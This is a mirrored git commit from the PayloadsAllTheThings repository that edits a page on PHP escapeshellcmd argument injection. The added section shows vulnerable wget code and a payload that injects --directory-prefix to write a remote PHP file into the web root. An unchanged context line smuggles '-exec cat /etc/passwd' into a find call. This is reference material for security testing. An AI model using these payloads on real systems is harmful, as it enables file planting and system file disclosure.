mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-07 09:23:55 +01:00
commit
3392980207
1 changed files with 12 additions and 1 deletions
|
|
@ -30,8 +30,9 @@ We can see by printing the command that all the parameters are splited allowing
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [List of exposed commands](#list-of-exposed-commands)
|
* [List of exposed commands](#list-of-exposed-commands)
|
||||||
* [TAR](#TAR)
|
|
||||||
* [CURL](#CURL)
|
* [CURL](#CURL)
|
||||||
|
* [TAR](#TAR)
|
||||||
|
* [FIND](#FIND)
|
||||||
* [WGET](#WGET)
|
* [WGET](#WGET)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
@ -81,6 +82,16 @@ $file = "sth -or -exec cat /etc/passwd ; -quit";
|
||||||
system("find /tmp -iname ".escapeshellcmd($file));
|
system("find /tmp -iname ".escapeshellcmd($file));
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### WGET
|
||||||
|
Example of vulnerable code
|
||||||
|
```php
|
||||||
|
system(escapeshellcmd('wget '.$url));
|
||||||
|
```
|
||||||
|
Arbitrary file write
|
||||||
|
```php
|
||||||
|
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue